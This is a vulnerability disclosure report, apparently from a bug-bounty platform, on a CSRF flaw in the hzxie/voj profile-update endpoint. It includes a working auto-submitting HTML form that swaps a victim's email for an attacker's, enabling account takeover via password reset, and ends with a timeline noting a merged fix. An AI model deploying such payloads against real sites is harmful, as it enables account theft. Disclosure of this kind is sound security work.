Cross-Site Request Forgery (CSRF) in hzxie/voj

Valid

Reported on

Sep 9th 2021


✍️ Description

The Update Profile has not any CSRF protection that make attackers able to change the users email and then can lead to account take over with Reset password functionality.

🕵️‍♂️ Proof of Concept

1.login as a user

2.Open PoC.html file.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://verwandlung.org/accounts/updateProfile.action" method="POST">
      <input type="hidden" name="email" value="attacker&#64;gmail&#46;com" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="website" value="" />
      <input type="hidden" name="socialLinks" value="&#123;&#125;" />
      <input type="hidden" name="aboutMe" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

You can see that the email will be changed to attacker@mail.com.

💥 Impact

This vulnerability is capable of take control of users accounts.

We have contacted a member of the hzxie/voj team and are waiting to hear back a month ago
We have sent a second follow up to the hzxie/voj team. We will try again in 10 days. a month ago
hzxie validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
hzxie confirmed that a fix has been merged on 74c17a a month ago
The fix bounty has been dropped